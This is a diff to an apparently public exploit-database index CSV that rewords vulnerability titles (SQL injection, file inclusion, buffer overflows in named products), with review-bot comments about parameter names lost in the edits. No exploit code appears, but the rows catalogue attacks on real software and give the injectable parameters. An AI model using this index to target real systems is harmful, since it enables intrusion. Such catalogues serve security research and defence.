 20818,platforms/windows/remote/20818.txt,"Microsoft IIS 5.0 - '.printer' ISAPI Extension Buffer Overflow (4)",2001-05-01,"Cyrus The Great",windows,remote,0
 20819,platforms/windows/remote/20819.txt,"BRS Webweaver 0.x - FTP Root Full Path Disclosure",2001-04-28,joetesta,windows,remote,0
-20820,platforms/windows/remote/20820.c,"Nullsoft Winamp 2.x - AIP Buffer Overflow",2001-04-29,byterage,windows,remote,0
+20820,platforms/windows/remote/20820.c,"NullSoft Winamp 2.x - AIP Buffer Overflow",2001-04-29,byterage,windows,remote,0
 20825,platforms/windows/remote/20825.txt,"Michael Lamont Savant HTTP Server 2.1 - Directory Traversal",2001-02-17,"Tom Tom",windows,remote,0
 20826,platforms/windows/remote/20826.txt,"Jason Rahaim MP3Mystic 1.0.x - Server Directory Traversal",2001-05-07,neme-dhc,windows,remote,0
 20829,platforms/windows/remote/20829.txt,"T. Hauck Jana Server 1.45/1.46 - Hex Encoded Directory Traversal",2001-05-07,neme-dhc,windows,remote,0
@@ -12968,7 +12968,7 @@ id,file,description,date,author,platform,type,port
 24557,platforms/windows/remote/24557.py,"Sami FTP Server 2.0.1 - LIST Command Buffer Overflow",2013-03-01,superkojiman,windows,remote,0
 24567,platforms/multiple/remote/24567.txt,"Oracle Database Server 8.1.7/9.0.x - ctxsys.driload Access Validation",2004-09-03,"Alexander Kornbrust",multiple,remote,0
 24568,platforms/windows/remote/24568.html,"Grokster 1.3/2.6 / KaZaA Media Desktop 1.3.x/1.6.1/2.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,windows,remote,0
-24571,platforms/windows/remote/24571.html,"Nullsoft Winamp 2.x/3.x/5.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,windows,remote,0
+24571,platforms/windows/remote/24571.html,"NullSoft Winamp 2.x/3.x/5.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,windows,remote,0
 24572,platforms/windows/remote/24572.pl,"Ipswitch WhatsUp Gold 7.0/8.0 - Notification Instance Name Remote Buffer Overflow",2004-09-03,anonymous,windows,remote,0
 24720,platforms/windows/remote/24720.txt,"Microsoft Internet Explorer 6 - IFRAME Status Bar URI Obfuscation",2004-11-02,"Benjamin Tobias Franz",windows,remote,0
 24581,platforms/multiple/remote/24581.txt,"SAFE TEAM Regulus 2.2 - Staffile Information Disclosure",2004-09-07,masud_libra,multiple,remote,0
@@ -13071,7 +13071,7 @@ id,file,description,date,author,platform,type,port
 25190,platforms/multiple/remote/25190.txt,"ca3de - Multiple Vulnerabilities",2005-03-03,"Luigi Auriemma",multiple,remote,0
 25191,platforms/multiple/remote/25191.txt,"JoWood Chaser 1.0/1.50 - Remote Buffer Overflow",2005-03-07,"Luigi Auriemma",multiple,remote,0
 25194,platforms/windows/remote/25194.txt,"Hosting Controller 1.x/6.1 - Multiple Information Disclosure Vulnerabilities",2005-03-07,"small mouse",windows,remote,0
-29277,platforms/windows/remote/29277.txt,"winamp Web interface 7.5.13 - Multiple Vulnerabilities",2006-12-11,"Luigi Auriemma",windows,remote,0
+29277,platforms/windows/remote/29277.txt,"Winamp Web interface 7.5.13 - Multiple Vulnerabilities",2006-12-11,"Luigi Auriemma",windows,remote,0
 24999,platforms/windows/remote/24999.py,"Light HTTPD 0.1 (Windows) - Buffer Overflow",2013-04-25,"Jacob Holcomb",windows,remote,0
 25294,platforms/windows/remote/25294.rb,"Microsoft Internet Explorer - CGenericElement Object Use-After-Free (Metasploit)",2013-05-07,Metasploit,windows,remote,0
 25001,platforms/linux/remote/25001.rb,"GroundWork - monarch_scan.cgi OS Command Injection (Metasploit)",2013-04-25,Metasploit,linux,remote,0
@@ -13234,7 +13234,7 @@ id,file,description,date,author,platform,type,port
 25986,platforms/php/remote/25986.txt,"Plesk < 9.5.4 - Remote Exploit",2013-06-05,kingcope,php,remote,0
 25987,platforms/hardware/remote/25987.txt,"Xpient - Cash Drawer Operation",2013-06-05,"Core Security",hardware,remote,0
 25988,platforms/multiple/remote/25988.txt,"Oracle9i Application Server 9.0.2 - MOD_ORADAV Access Control",2003-02-13,"David Litchfield",multiple,remote,0
-25989,platforms/windows/remote/25989.txt,"Nullsoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow",2005-07-15,"Leon Juranic",windows,remote,0
+25989,platforms/windows/remote/25989.txt,"NullSoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow",2005-07-15,"Leon Juranic",windows,remote,0
 25999,platforms/windows/remote/25999.rb,"Microsoft Internet Explorer - textNode Use-After-Free (Metasploit)",2013-06-07,"Scott Bell",windows,remote,0
 26002,platforms/multiple/remote/26002.txt,"Oracle Reports Server 6.0.8/9.0.x - XML File Disclosure",2005-07-19,"Alexander Kornbrust",multiple,remote,0
 26003,platforms/multiple/remote/26003.txt,"Oracle Reports Server 6.0.8/9.0.x - Arbitrary File Disclosure",2005-07-19,"Alexander Kornbrust",multiple,remote,0
@@ -17705,7 +17705,7 @@ id,file,description,date,author,platform,type,port
 4238,platforms/php/webapps/4238.txt,"Adult Directory - 'cat_id' SQL Injection",2007-07-27,t0pP8uZz,php,webapps,0
 4239,platforms/asp/webapps/4239.txt,"SimpleBlog 3.0 - (comments_get.asp id) SQL Injection",2007-07-28,g00ns,asp,webapps,0
 4241,platforms/php/webapps/4241.txt,"PHP123 Top Sites - 'category.php cat' SQL Injection",2007-07-28,t0pP8uZz,php,webapps,0
-4242,platforms/php/webapps/4242.php,"LinPHA 1.3.1 - (new_images.php) Blind SQL Injection",2007-07-29,EgiX,php,webapps,0
+4242,platforms/php/webapps/4242.php,"LinPHA 1.3.1 - 'new_images.php' Blind SQL Injection",2007-07-29,EgiX,php,webapps,0
 4246,platforms/php/webapps/4246.txt,"wolioCMS - Authentication Bypass / SQL Injection",2007-07-30,k1tk4t,php,webapps,0
 4248,platforms/php/webapps/4248.txt,"Joomla! Component com_gmaps 1.00 - (mapId) SQL Injection",2007-07-31,"Mehmet Ince",php,webapps,0
 4253,platforms/php/webapps/4253.pl,"paBugs 2.0 Beta 3 - (main.php cid) SQL Injection",2007-08-02,uimp,php,webapps,0
@@ -17782,7 +17782,7 @@ id,file,description,date,author,platform,type,port
 4395,platforms/php/webapps/4395.txt,"NuclearBB Alpha 2 - 'ROOT_PATH' Remote File Inclusion",2007-09-11,"Rootshell Security",php,webapps,0
 4396,platforms/php/webapps/4396.txt,"X-Cart - Multiple Remote File Inclusion",2007-09-11,aLiiF,php,webapps,0
 4397,platforms/php/webapps/4397.rb,"WordPress 1.5.1.1 <= 2.2.2 - Multiple Vulnerabilities",2007-09-14,"Lance M. Havok",php,webapps,0
-4400,platforms/php/webapps/4400.txt,"KwsPHP Module jeuxflash 1.0 - 'id' SQL Injection",2007-09-13,Houssamix,php,webapps,0
+4400,platforms/php/webapps/4400.txt,"KwsPHP Module jeuxflash 1.0 - 'id' Parameter SQL Injection",2007-09-13,Houssamix,php,webapps,0
 4401,platforms/php/webapps/4401.txt,"Joomla! Component Joomlaradio 5.0 - Remote File Inclusion",2007-09-13,Morgan,php,webapps,0
 4404,platforms/php/webapps/4404.txt,"GForge < 4.6b2 - (skill_delete) SQL Injection",2007-09-13,"Sumit Siddharth",php,webapps,0
 4405,platforms/php/webapps/4405.txt,"Ajax File Browser 3b - (settings.inc.php approot) Remote File Inclusion",2007-09-14,"arfis project",php,webapps,0
@@ -17872,7 +17872,7 @@ id,file,description,date,author,platform,type,port
 4519,platforms/php/webapps/4519.txt,"Pindorama 0.1 - client.php Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps,0
 4520,platforms/php/webapps/4520.txt,"PicoFlat CMS 0.4.14 - 'index.php' Remote File Inclusion",2007-10-11,0in,php,webapps,0
 4521,platforms/php/webapps/4521.txt,"Joomla! Component Flash uploader 2.5.1 - Remote File Inclusion",2007-10-11,mdx,php,webapps,0
-4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 - Newsletter Module SQL Injection",2007-10-11,s4mi,php,webapps,0
+4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 Module Newsletter - SQL Injection",2007-10-11,s4mi,php,webapps,0
 4524,platforms/php/webapps/4524.txt,"Joomla! Component com_colorlab 1.0 - Remote File Inclusion",2007-10-12,"Mehmet Ince",php,webapps,0
 4525,platforms/php/webapps/4525.pl,"TikiWiki 1.9.8 - 'tiki-graph_formula.php' Command Execution",2007-10-12,str0ke,php,webapps,0
 4527,platforms/php/webapps/4527.txt,"Softbiz Recipes Portal Script - SQL Injection",2007-10-13,"Khashayar Fereidani",php,webapps,0
@@ -18453,45 +18453,45 @@ id,file,description,date,author,platform,type,port
 5339,platforms/php/webapps/5339.php,"Nuked-klaN 1.7.6 - Multiple Vulnerabilities",2008-04-01,"Charles Fol",php,webapps,0
 5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 - SQL Injection",2008-04-01,DreamTurk,php,webapps,0
 5345,platforms/php/webapps/5345.txt,"Joomla! Component OnlineFlashQuiz 1.0.2 - Remote File Inclusion",2008-04-02,NoGe,php,webapps,0
-5347,platforms/php/webapps/5347.txt,"DaZPHP 0.1 - (prefixdir) Local File Inclusion",2008-04-02,w0cker,php,webapps,0
-5348,platforms/php/webapps/5348.txt,"PhpBlock a8.4 - (PATH_TO_CODE) Remote File Inclusion",2008-04-02,w0cker,php,webapps,0
-5350,platforms/php/webapps/5350.txt,"KwsPHP Module Galerie - (id_gal) SQL Injection",2008-04-03,S@BUN,php,webapps,0
-5351,platforms/php/webapps/5351.txt,"KwsPHP Module Archives - 'id' SQL Injection",2008-04-03,S@BUN,php,webapps,0
-5352,platforms/php/webapps/5352.txt,"KwsPHP Module jeuxflash (cat) 1.0 - SQL Injection",2008-04-03,Houssamix,php,webapps,0
-5353,platforms/php/webapps/5353.txt,"KwsPHP Module ConcoursPhoto - (C_ID) SQL Injection",2008-04-03,Stack,php,webapps,0
-5358,platforms/php/webapps/5358.pl,"XPOZE Pro 3.05 - (reed) SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
-5359,platforms/php/webapps/5359.txt,"Vastal I-Tech Software Zone - 'cat_id' SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
-5360,platforms/php/webapps/5360.txt,"sabros.us 1.75 - (thumbnails.php) Remote File Disclosure",2008-04-04,HaCkeR_EgY,php,webapps,0
-5362,platforms/php/webapps/5362.txt,"Comdev News Publisher - SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
-5363,platforms/php/webapps/5363.txt,"Affiliate Directory - 'cat_id' SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
-5364,platforms/php/webapps/5364.txt,"PHP Photo Gallery 1.0 - (photo_id) SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
-5365,platforms/php/webapps/5365.txt,"Blogator-script 0.95 - (incl_page) Remote File Inclusion",2008-04-04,JIKO,php,webapps,0
-5367,platforms/php/webapps/5367.pl,"PIGMy-SQL 1.4.1 - (getdata.php id) Blind SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
-5368,platforms/php/webapps/5368.txt,"Blogator-script 0.95 - (id_art) SQL Injection",2008-04-04,"Virangar Security",php,webapps,0
-5369,platforms/php/webapps/5369.txt,"Dragoon 0.1 - (lng) Local File Inclusion",2008-04-04,w0cker,php,webapps,0
+5347,platforms/php/webapps/5347.txt,"DaZPHP 0.1 - 'prefixdir' Parameter Local File Inclusion",2008-04-02,w0cker,php,webapps,0
+5348,platforms/php/webapps/5348.txt,"PhpBlock a8.4 - 'PATH_TO_CODE' Parameter Remote File Inclusion",2008-04-02,w0cker,php,webapps,0
+5350,platforms/php/webapps/5350.txt,"KwsPHP 1.3.456 Module Galerie - 'id_gal' Parameter SQL Injection",2008-04-03,S@BUN,php,webapps,0
+5351,platforms/php/webapps/5351.txt,"KwsPHP 1.3.456 Module Archives - 'id' Parameter SQL Injection",2008-04-03,S@BUN,php,webapps,0
+5352,platforms/php/webapps/5352.txt,"KwsPHP Module jeuxflash 1.0 - 'cat' Parameter SQL Injection",2008-04-03,Houssamix,php,webapps,0
+5353,platforms/php/webapps/5353.txt,"KwsPHP Module ConcoursPhoto 2.0 - 'C_ID' Parameter SQL Injection",2008-04-03,Stack,php,webapps,0
+5358,platforms/php/webapps/5358.pl,"XPOZE Pro 3.05 - 'reed' Parameter SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
+5359,platforms/php/webapps/5359.txt,"Vastal I-Tech Software Zone - 'cat_id' Parameter SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
+5360,platforms/php/webapps/5360.txt,"Sabros.us 1.75 - 'thumbnails.php' Remote File Disclosure",2008-04-04,HaCkeR_EgY,php,webapps,0
+5362,platforms/php/webapps/5362.txt,"Comdev News Publisher 4.1.2 - SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
+5363,platforms/php/webapps/5363.txt,"Affiliate Directory - 'cat_id' Parameter SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
+5364,platforms/php/webapps/5364.txt,"PHP Photo Gallery 1.0 - 'photo_id' Parameter SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
+5365,platforms/php/webapps/5365.txt,"Blogator-script 0.95 - 'incl_page' Parameter Remote File Inclusion",2008-04-04,JIKO,php,webapps,0
+5367,platforms/php/webapps/5367.pl,"PIGMy-SQL 1.4.1 - 'getdata.php' Blind SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
+5368,platforms/php/webapps/5368.txt,"Blogator-script 0.95 - 'id_art' Parameter SQL Injection",2008-04-04,"Virangar Security",php,webapps,0
+5369,platforms/php/webapps/5369.txt,"Dragoon 0.1 - 'lng' Parameter Local File Inclusion",2008-04-04,w0cker,php,webapps,0
 5370,platforms/php/webapps/5370.txt,"Blogator-script 0.95 - Change User Password",2008-04-05,"Virangar Security",php,webapps,0
 5371,platforms/php/webapps/5371.txt,"Entertainment Directory 1.1 - SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
-5372,platforms/php/webapps/5372.txt,"Easynet Forum Host - 'forum.php forum' SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
-5373,platforms/asp/webapps/5373.txt,"CoBaLT 0.1 - Multiple SQL Injections",2008-04-05,U238,asp,webapps,0
-5374,platforms/php/webapps/5374.txt,"Gaming Directory 1.0 - 'cat_id' SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
+5372,platforms/php/webapps/5372.txt,"Easynet Forum Host - 'forum.php' SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
+5373,platforms/asp/webapps/5373.txt,"Cobalt 0.1 - Multiple SQL Injections",2008-04-05,U238,asp,webapps,0
+5374,platforms/php/webapps/5374.txt,"Gaming Directory 1.0 - 'cat_id' Parameter SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
 5375,platforms/php/webapps/5375.txt,"visualpic 0.3.1 - Remote File Inclusion",2008-04-05,Cr@zy_King,php,webapps,0
 5376,platforms/php/webapps/5376.pl,"Picture Rating 1.0 - Blind SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
-5377,platforms/php/webapps/5377.txt,"Links Directory 1.1 - 'cat_id' SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
-5378,platforms/php/webapps/5378.txt,"Software Index 1.1 - 'cid' SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
+5377,platforms/php/webapps/5377.txt,"Links Directory 1.1 - 'cat_id' Parameter SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
+5378,platforms/php/webapps/5378.txt,"Software Index 1.1 - 'cid' Parameter SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
 5379,platforms/php/webapps/5379.txt,"MyBB Plugin Custom Pages 1.0 - SQL Injection",2008-04-06,Lidloses_Auge,php,webapps,0
 5380,platforms/php/webapps/5380.txt,"Blog PixelMotion - 'sauvBase.php' Arbitrary Database Backup",2008-04-06,JIKO,php,webapps,0
 5381,platforms/php/webapps/5381.txt,"Blog PixelMotion - 'modif_config.php' Arbitrary File Upload",2008-04-06,JIKO,php,webapps,0
-5382,platforms/php/webapps/5382.txt,"Blog PixelMotion - 'index.php categorie' SQL Injection",2008-04-06,parad0x,php,webapps,0
-5383,platforms/php/webapps/5383.txt,"Site Sift Listings - 'id' SQL Injection",2008-04-06,S@BUN,php,webapps,0
+5382,platforms/php/webapps/5382.txt,"Blog PixelMotion - 'categorie' Parameter SQL Injection",2008-04-06,parad0x,php,webapps,0
+5383,platforms/php/webapps/5383.txt,"Site Sift Listings - 'id' Parameter SQL Injection",2008-04-06,S@BUN,php,webapps,0
 5384,platforms/php/webapps/5384.txt,"Prozilla Top 100 1.2 - Arbitrary Delete Stats",2008-04-06,t0pP8uZz,php,webapps,0
-5385,platforms/php/webapps/5385.txt,"Prozilla Forum Service - 'forum.php forum' SQL Injection",2008-04-06,t0pP8uZz,php,webapps,0
+5385,platforms/php/webapps/5385.txt,"Prozilla Forum Service - 'forum' Parameter SQL Injection",2008-04-06,t0pP8uZz,php,webapps,0
 5387,platforms/php/webapps/5387.txt,"Prozilla Reviews Script 1.0 - Arbitrary Delete User",2008-04-06,t0pP8uZz,php,webapps,0
 5388,platforms/php/webapps/5388.txt,"Prozilla Topsites 1.0 - Arbitrary Edit/Add Users",2008-04-06,t0pP8uZz,php,webapps,0
 5389,platforms/php/webapps/5389.txt,"Prozilla Cheat Script 2.0 - 'id' SQL Injection",2008-04-06,t0pP8uZz,php,webapps,0
-5390,platforms/php/webapps/5390.txt,"Prozilla Freelancers - (project) SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0
+5390,platforms/php/webapps/5390.txt,"Prozilla Freelancers - 'project' Parameter SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0
 5391,platforms/php/webapps/5391.php,"Drake CMS 0.4.11 - Blind SQL Injection",2008-04-07,EgiX,php,webapps,0
-5392,platforms/php/webapps/5392.php,"LinPHA 1.3.3 - (maps plugin) Remote Command Execution",2008-04-07,EgiX,php,webapps,0
-5393,platforms/php/webapps/5393.txt,"Dragoon 0.1 - (root) Remote File Inclusion",2008-04-07,RoMaNcYxHaCkEr,php,webapps,0
+5392,platforms/php/webapps/5392.php,"LinPHA 1.3.3 Plugin Maps - Remote Command Execution",2008-04-07,EgiX,php,webapps,0
+5393,platforms/php/webapps/5393.txt,"Dragoon 0.1 - 'root' Parameter Remote File Inclusion",2008-04-07,RoMaNcYxHaCkEr,php,webapps,0
 5394,platforms/php/webapps/5394.txt,"Mole 2.1.0 - (viewsource.php) Remote File Disclosure",2008-04-07,GoLd_M,php,webapps,0
 5399,platforms/php/webapps/5399.txt,"ChartDirector 4.1 - (viewsource.php) File Disclosure",2008-04-07,Stack,php,webapps,0
 5400,platforms/php/webapps/5400.txt,"724CMS 4.01 Enterprise - (index.php ID) SQL Injection",2008-04-07,Lidloses_Auge,php,webapps,0
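Review bot: The rewritten rows 5367 and 5372 drop the injectable parameter name (`id` and `forum`) that the old descriptions carried, while the neighbouring rows in the same hunk (5382, 5385, 5390) are normalised to the `'<name>' Parameter` form, so the index now records less than it did for those two entries. Keeping the parameter gives `"PIGMy-SQL 1.4.1 - 'getdata.php' id Parameter Blind SQL Injection"` and `"Easynet Forum Host - 'forum' Parameter SQL Injection"`, the latter matching how 5385 was rewritten. The same loss occurs for 6894 in the hunk at 19648, where `'Directory.php id'` becomes `'directory.php'` and also changes the script name's case while the sibling row 6895 keeps `Directory.php`; if the file really is lower-case, 6895 should follow, otherwise 6894 should not.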
@@ -19153,7 +19153,7 @@ id,file,description,date,author,platform,type,port
 6189,platforms/php/webapps/6189.txt,"GreenCart PHP Shopping Cart - 'id' SQL Injection",2008-08-01,"Hussin X",php,webapps,0
 6190,platforms/php/webapps/6190.txt,"phsBlog 0.1.1 - Multiple SQL Injections",2008-08-01,cOndemned,php,webapps,0
 6191,platforms/php/webapps/6191.txt,"e-vision CMS 2.02 - (SQL Injection / Arbitrary File Upload / Information Gathering) Multiple Vulnerabilities",2008-08-02,"Khashayar Fereidani",php,webapps,0
-6192,platforms/php/webapps/6192.txt,"k-links directory - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-08-02,Corwin,php,webapps,0
+6192,platforms/php/webapps/6192.txt,"k-links directory - SQL Injection / Cross-Site Scripting",2008-08-02,Corwin,php,webapps,0
 6193,platforms/php/webapps/6193.txt,"E-Store Kit-1 <= 2 PayPal Edition - 'pid' SQL Injection",2008-08-02,Mr.SQL,php,webapps,0
 6194,platforms/php/webapps/6194.pl,"moziloCMS 1.10.1 - 'download.php' Arbitrary Download File Exploit",2008-08-02,Ams,php,webapps,0
 6199,platforms/php/webapps/6199.pl,"Joomla! Component EZ Store Remote - Blind SQL Injection",2008-08-03,His0k4,php,webapps,0
@@ -19193,7 +19193,7 @@ id,file,description,date,author,platform,type,port
 6260,platforms/php/webapps/6260.txt,"cyberBB 0.6 - Multiple SQL Injections",2008-08-18,cOndemned,php,webapps,0
 6261,platforms/php/webapps/6261.txt,"PHP live helper 2.0.1 - Multiple Vulnerabilities",2008-08-18,"GulfTech Security",php,webapps,0
 6269,platforms/cgi/webapps/6269.txt,"TWiki 4.2.0 - (configure) Remote File Disclosure",2008-08-19,Th1nk3r,cgi,webapps,0
-6270,platforms/php/webapps/6270.txt,"SFS Affiliate Directory - 'id' SQL Injection",2008-08-19,"Hussin X",php,webapps,0
+6270,platforms/php/webapps/6270.txt,"Affiliate Directory - 'id' Parameter SQL Injection",2008-08-19,"Hussin X",php,webapps,0
 6271,platforms/php/webapps/6271.txt,"Ad Board - 'id' SQL Injection",2008-08-19,"Hussin X",php,webapps,0
 6273,platforms/php/webapps/6273.txt,"SunShop 4.1.4 - 'id' SQL Injection",2008-08-19,"GulfTech Security",php,webapps,0
 6276,platforms/php/webapps/6276.txt,"Banner Management Script - 'tr.php id' SQL Injection",2008-08-19,S.W.A.T.,php,webapps,0
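Review bot: The new description for 6270 drops the `SFS` vendor prefix, which goes beyond the `'id' Parameter` normalisation the rest of the commit applies and makes the product name identical to row 5363 (`Affiliate Directory`, a different author and date). Unless the advisory confirms these are the same product, the vendor should stay: `"SFS Affiliate Directory - 'id' Parameter SQL Injection"`. The other SFS rows touched in this commit (6894, 6906) keep their prefix, so this one looks accidental.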
@@ -19648,7 +19648,7 @@ id,file,description,date,author,platform,type,port
 6891,platforms/php/webapps/6891.txt,"Absolute Form Processor 4.0 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0
 6892,platforms/php/webapps/6892.txt,"Absolute Live Support 5.1 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0
 6893,platforms/php/webapps/6893.txt,"Absolute Control Panel XE 1.5 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0
-6894,platforms/php/webapps/6894.txt,"SFS EZ Gaming Directory - 'Directory.php id' SQL Injection",2008-10-31,Hurley,php,webapps,0
+6894,platforms/php/webapps/6894.txt,"SFS EZ Gaming Directory - 'directory.php' SQL Injection",2008-10-31,Hurley,php,webapps,0
 6895,platforms/php/webapps/6895.txt,"SFS EZ Adult Directory - 'Directory.php id' SQL Injection",2008-10-31,Hurley,php,webapps,0
 6896,platforms/php/webapps/6896.txt,"Logz podcast CMS 1.3.1 - (add_url.php art) SQL Injection",2008-10-31,ZoRLu,php,webapps,0
 6897,platforms/php/webapps/6897.txt,"cpanel 11.x - Cross-Site Scripting / Local File Inclusion",2008-10-31,"Khashayar Fereidani",php,webapps,0
@@ -19659,7 +19659,7 @@ id,file,description,date,author,platform,type,port
 6903,platforms/php/webapps/6903.txt,"SFS EZ HotScripts-like Site - 'cid' SQL Injection",2008-10-31,TR-ShaRk,php,webapps,0
 6904,platforms/php/webapps/6904.txt,"Absolute NewsLetter 6.1 - Insecure Cookie Handling",2008-10-31,x0r,php,webapps,0
 6905,platforms/php/webapps/6905.txt,"SFS EZ Hosting Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps,0
-6906,platforms/php/webapps/6906.txt,"SFS EZ Gaming Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps,0
+6906,platforms/php/webapps/6906.txt,"SFS EZ Gaming Directory - 'cat_id' Parameter SQL Injection",2008-10-31,BeyazKurt,php,webapps,0
 6907,platforms/php/webapps/6907.txt,"SFS EZ Home Business Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps,0
 6908,platforms/php/webapps/6908.txt,"SFS EZ Link Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps,0
 6909,platforms/php/webapps/6909.txt,"Adult Banner Exchange Website - (targetid) SQL Injection",2008-10-31,"Hussin X",php,webapps,0
@@ -23038,7 +23038,7 @@ id,file,description,date,author,platform,type,port
 12619,platforms/php/webapps/12619.txt,"Cybertek CMS - Local File Inclusion",2010-05-16,XroGuE,php,webapps,0
 12620,platforms/php/webapps/12620.txt,"The iceberg - 'Content Management System' SQL Injection",2010-05-16,cyberlog,php,webapps,0
 12623,platforms/php/webapps/12623.txt,"Joomla! Component 'com_simpledownload' 0.9.5 - Local File Disclosure",2010-05-16,ALTBTA,php,webapps,0
-12624,platforms/php/webapps/12624.txt,"LinPHA 1.3.2 - (rotate.php) Remote Command Execution",2010-05-16,"Sn!pEr.S!Te Hacker",php,webapps,0
+12624,platforms/php/webapps/12624.txt,"LinPHA 1.3.2 - 'rotate.php' Remote Command Execution",2010-05-16,"Sn!pEr.S!Te Hacker",php,webapps,0
 12628,platforms/php/webapps/12628.txt,"EgO 0.7b - 'FCKeditor' Arbitrary File Upload",2010-05-16,ITSecTeam,php,webapps,0
 12629,platforms/php/webapps/12629.txt,"Tainos - Multiple Vulnerabilities",2010-05-16,XroGuE,php,webapps,0
 12630,platforms/php/webapps/12630.txt,"I-Vision CMS - Cross-Site Scripting / SQL Injection",2010-05-16,Ariko-Security,php,webapps,0
@@ -25553,7 +25553,7 @@ id,file,description,date,author,platform,type,port
 20981,platforms/php/webapps/20981.txt,"SugarCRM Community Edition 6.5.2 (Build 8410) - Multiple Vulnerabilities",2012-09-01,"Brendan Coles",php,webapps,0
 20983,platforms/php/webapps/20983.pl,"Joomla! Component 'com_spidercalendar' - SQL Injection",2012-09-01,D4NB4R,php,webapps,0
 20987,platforms/asp/webapps/20987.txt,"Citrix Nfuse 1.51 - Webroot Disclosure",2001-07-02,sween,asp,webapps,0
-20995,platforms/php/webapps/20995.txt,"cobalt qube webmail 1.0 - Directory Traversal",2001-07-05,kf,php,webapps,0
+20995,platforms/php/webapps/20995.txt,"Cobalt Qube Webmail 1.0 - Directory Traversal",2001-07-05,kf,php,webapps,0
 20996,platforms/php/webapps/20996.txt,"Basilix Webmail 1.0 - File Disclosure",2001-07-06,"karol _",php,webapps,0
 21005,platforms/php/webapps/21005.txt,"admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",php,webapps,0
 21007,platforms/php/webapps/21007.txt,"AV Arcade Free Edition - 'add_rating.php id Parameter' Blind SQL Injection",2012-09-02,DaOne,php,webapps,0
@@ -28728,10 +28728,10 @@ id,file,description,date,author,platform,type,port
 27188,platforms/ios/webapps/27188.txt,"Private Photos 1.0 iOS - Persistent Cross-Site Scripting",2013-07-29,Vulnerability-Lab,ios,webapps,0
 27189,platforms/ios/webapps/27189.txt,"WebDisk 3.0.2 PhotoViewer iOS - Command Execution",2013-07-29,Vulnerability-Lab,ios,webapps,0
 27190,platforms/php/webapps/27190.txt,"FluxBB 1.5.3 - Multiple Vulnerabilities",2013-07-29,LiquidWorm,php,webapps,0
-27192,platforms/php/webapps/27192.txt,"LinPHA 0.9.x/1.0 - 'index.php' lang Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0
-27193,platforms/php/webapps/27193.txt,"LinPHA 0.9.x/1.0 - install.php language Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0
-27194,platforms/php/webapps/27194.txt,"LinPHA 0.9.x/1.0 - sec_stage_install.php language Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0
-27195,platforms/php/webapps/27195.txt,"LinPHA 0.9.x/1.0 - forth_stage_install.php language Variable POST Method Local File Inclusion",2006-02-11,rgod,php,webapps,0
+27192,platforms/php/webapps/27192.txt,"LinPHA 0.9.x/1.0 - 'lang' Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0
+27193,platforms/php/webapps/27193.txt,"LinPHA 0.9.x/1.0 - 'install.php' Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0
+27194,platforms/php/webapps/27194.txt,"LinPHA 0.9.x/1.0 - 'sec_stage_install.php' Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0
+27195,platforms/php/webapps/27195.txt,"LinPHA 0.9.x/1.0 - 'forth_stage_install.php' Local File Inclusion",2006-02-11,rgod,php,webapps,0
 27197,platforms/php/webapps/27197.txt,"ImageVue 0.16.1 - dir.php Folder Permission Disclosure",2006-02-11,zjieb,php,webapps,0
 27198,platforms/php/webapps/27198.txt,"ImageVue 0.16.1 - readfolder.php path Variable Arbitrary Directory Listing",2006-02-11,zjieb,php,webapps,0
 27199,platforms/php/webapps/27199.txt,"ImageVue 0.16.1 - 'index.php' bgcol Parameter Cross-Site Scripting",2006-02-11,zjieb,php,webapps,0
@@ -29078,7 +29078,6 @@ id,file,description,date,author,platform,type,port
 27666,platforms/php/webapps/27666.txt,"Manila 9.0.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-17,"Aaron Kaplan",php,webapps,0
 27667,platforms/php/webapps/27667.txt,"MyBB 1.1 - Global Variable Overwrite",2006-04-17,imei,php,webapps,0
 27669,platforms/php/webapps/27669.txt,"Coppermine 1.4.4 - 'index.php' Local File Inclusion",2006-04-17,imei,php,webapps,0
